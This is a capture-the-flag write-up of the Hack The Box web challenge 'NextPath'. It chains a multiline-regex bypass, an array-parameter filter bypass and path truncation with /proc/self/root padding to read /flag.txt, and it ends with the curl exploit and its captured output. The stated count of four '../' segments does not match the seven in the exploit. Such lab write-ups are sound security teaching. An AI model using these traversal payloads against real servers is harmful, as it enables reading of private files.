NextPath

Posted on Sat 28 December 2024 in HTB challenge

This is a writeup of NextPath, a web challenge from Hack The Box.

The Dockerfile shows that the flag is copied to the root directory:

COPY flag.txt /flag.txt

Goal: read the flag in the root directory.

team.js

The script is vulnerable because of a multiline regex:

const ID_REGEX = /^[0-9]+$/m;

With the m flag, ^ and $ match at line boundaries, so only the first line has to consist of digits; after a newline the user can send any other characters.

Directory traversal filter bypass

  if (query.id.includes("/") || query.id.includes("..")) {
    console.error("DIRECTORY TRAVERSAL DETECTED:", query.id);
    res.status(400).end("DIRECTORY TRAVERSAL DETECTED?!? This incident will be reported.");
    return;
  }

If id is an array, only the first element will be checked, so use multiple id parameters in the URL.

Read flag

const filepath = path.join("team", query.id + ".png");
const content = fs.readFileSync(filepath.slice(0, 100));

The input is prefixed with team/ and suffixed with .png, and the resulting path is then cut off at 100 characters.

If query.id is long enough, the .png suffix is pushed past the 100-character cut-off.

flag.txt is 8 characters long.

So there are 100 - 8 = 92 characters available to get from the team directory to the root directory.

In the Docker container, process id 18 is usually in use. Every /proc/<pid>/root entry resolves back to the container's root filesystem, so these building blocks can be combined to consume exactly 92 characters without leaving /:

flag.txt          8 characters
../               3 characters
/proc/1/root     12 characters
/proc/18/root    13 characters
/proc/self/root  15 characters

Solving the length equation (4 * 3 + 15 + 5 * 13 = 92):

4x ../
1x /proc/self/root
5x /proc/18/root
+ flag.txt

Exploit

curl -v 'http://83.136.255.126:51879/api/team?id=1%0Aa&id=../../../../../../../proc/self/root/proc/18/root/proc/18/root/proc/18/root/proc/18/root/proc/18/root/flag.txt'
*   Trying 83.136.255.126:51879...
* Connected to 83.136.255.126 (83.136.255.126) port 51879
> GET /api/team?id=1%0Aa&id=../../../../../../../proc/self/root/proc/18/root/proc/18/root/proc/18/root/proc/18/root/proc/18/root/flag.txt HTTP/1.1
> Host: 83.136.255.126:51879
> User-Agent: curl/8.7.1
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 200 OK
< content-type: image/png
< date: Mon, 25 Nov 2024 13:38:48 GMT
< connection: close
< transfer-encoding: chunked
<
HTB{tr4v3r51ng_p45t_411_th3_ch3ck5...t4sk_w3ll_d0ne!}
* Closing connection
